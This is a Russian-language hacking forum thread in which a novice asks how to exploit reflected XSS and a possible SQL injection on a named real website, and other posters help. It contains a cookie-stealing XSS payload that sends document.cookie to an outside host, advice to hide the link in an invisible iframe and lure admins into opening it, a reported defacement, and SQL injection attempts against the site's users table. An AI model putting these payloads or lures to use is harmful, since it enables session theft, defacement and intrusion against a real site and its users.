Нашел дыру, но не знаю че делать дальше - помогите новичку :)

Привет всем, я нашел дыру вот тут -

1. http://wow.crpg.ru/search.php
если сделать так:
http://wow.crpg.ru/search.php?query=></td></tr></form></table><script>alert(document.cookie);</script

то вроде все получается, однако это же нечеловечно, хотелось бы поцивелизованнее чтоли... в общем не знаю как и что еще можно оттуда извлечь...

2. а еще там же дыра -
http://wow.crpg.ru/printfeature.php?artid=
если ввести после равно qwerty то выпадает в ошибку базы. Как можно провести хацк?

 

1 Можно украсть куки.

2 Это по ходу не дыра.. А ошибка в скрипте.

 

Угу, второй случай - просто обработка этого qwerty и иже с ними неправильна. Вот скрипт и ругается. Посмотрел бы сам вначале, чем тревогу бить.. видно же что кроме пути к файлу, здесь больше ничё не выцепишь.

А по 1 случаю. ХЗ. помоему хрен что сделаешь)). Хотя я не смотрел, признаюсь).

 

Тык как цивилизованно украсть то? не пошлешь же ссылку вида
http://wow.crpg.ru/search.php?query=></td></tr></form></table><script>img = new Image(); img.src =<a href="http://antichat.ru/cgi-bin/s.jpg">+document.cookie;</script>

Как-бы ее запрятать так, чтоб явно не торчала...

 

А ошибка в скрипте - не дыра? ))

 

нет...

 

КЕЗ не всегда.
"))))"

 

нет, конечно если там написано
fopem вместо fopen то да, это вообще ничего работать небудет,
но в данном случае это и ест дыра

 

Ближе к теме, мальчики и девочки
с похожей ссылкой удалось сделать дефейс сменой картинки бекграунда, но опять же увидишь, только если полностью набить адрес+код в експлорере...

 

Сначала выясни - что хранится в куках. Если там есть пасс (хэш пасса), то просто создаешь страницу с нулевым (невидимым фреймом) где ссылка на этот фрейм будет та которую ты нашел. И после всего этого пишешь или по личке или еще кому-нить - так мол и так. Гляньте на страницу (чтобы глянули - прояви фантазию).

p.s. только сначала проверь чтобы все фурычило, иногда неполучится куку перхватить

 

а во второй ссылке разве нету Скуль Инж-а?

 

я и про это =)) а то сказали что нету во второй ничего это просто ошибка...там же написано что ошибка в мускуле...значит есть вероятность инжекшена

 

Тык примерчик напишите, хуч... ато уже от видеохаков глаза болят

Я понимаю что нужно выполнить запрос, но не могу воткнуть как

 

я не силен в мускл но обычный запроса типа 999'СЕЛЕКТ админ ФРОМ юзерз не сработал )))

 

Осталось только подставить where с именем пользователя:

Спать хочу, не могу =)

 

ыы... а дальше что? Чувствую себя тупым как буратино : (

 

Странно, что не работает. Ошибки нет, имена столбцов тоже правильно угаданы. =) Может кто знает почему?

 

странно...)

 

Да, очень странно